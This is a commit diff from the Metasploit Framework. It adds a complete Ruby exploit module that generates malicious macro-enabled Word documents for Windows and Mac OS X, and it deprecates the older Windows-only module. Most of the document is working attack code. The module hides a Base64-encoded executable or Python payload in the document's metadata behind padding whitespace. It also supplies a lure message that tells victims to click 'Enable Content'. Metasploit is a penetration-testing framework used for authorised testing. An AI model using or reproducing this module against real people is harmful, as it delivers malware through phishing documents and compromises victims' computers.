Deprecate windows/fileformat/office_word_macro

Please use exploits/multi/fileformat/office_word_macro instead,
because the new one supports OS X.

Author: wchen-r7

modules/exploits/multi/fileformat/office_word_macro.rb

@@ -0,0 +1,122 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microsoft Office Word Malicious Macro Execution",
+      'Description'    => %q{
+        This module generates a macro-enabled Microsoft Office Word document. The comments
+        metadata in the data is injected with a Base64 encoded payload, which will be
+        decoded by the macro and execute as a Windows executable.
+
+        For a successful attack, the victim is required to manually enable macro execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'sinn3r' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => true
+        },
+      'Targets'        =>
+        [
+          [
+            'Microsoft Office Word on Windows',
+            {
+              'Platform' => 'win',
+            }
+          ],
+          [
+            'Microsoft Office Word on Mac OS X (Python)',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jan 10 2012"
+    ))
+
+    register_options([
+      OptString.new("BODY", [false, 'The message for the document body',
+        'Contents of this document are protected. Please click Enable Content to continue.'
+      ]),
+      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
+    ], self.class)
+  end
+
+
+  def on_file_read(short_fname, full_fname)
+    buf = File.read(full_fname)
+
+    case short_fname
+    when /document\.xml/
+      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
+    when /core\.xml/
+      p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
+      b64_payload = ' ' * 55
+      b64_payload << Rex::Text.encode_base64(p)
+      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
+    end
+
+    # The original filename of __rels is actually ".rels".
+    # But for some reason if that's our original filename, it won't be included
+    # in the archive. So this hacks around that.
+    case short_fname
+    when /__rels/
+      short_fname.gsub!(/\_\_rels/, '.rels')
+    end
+
+    yield short_fname, buf
+  end
+
+
+  def package_docm(path)
+    zip = Rex::Zip::Archive.new
+
+    Dir["#{path}/**/**"].each do |file|
+      p = file.sub(path+'/','')
+
+      if File.directory?(file)
+        print_status("Packaging directory: #{file}")
+        zip.add_file(p)
+      else
+        on_file_read(p, file) do |fname, buf|
+          print_status("Packaging file: #{fname}")
+          zip.add_file(fname, buf)
+        end
+      end
+    end
+
+    zip.pack
+  end
+
+
+  def exploit
+    print_status('Generating our docm file...')
+    path  = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
+    docm = package_docm(path)
+    file_create(docm)
+    super
+  end
+
+end

modules/exploits/windows/fileformat/office_word_macro.rb

@@ -11,6 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2017, 3, 16), 'exploit/multi/fileformat/office_word_macro')
 
   def initialize(info={})
     super(update_info(info,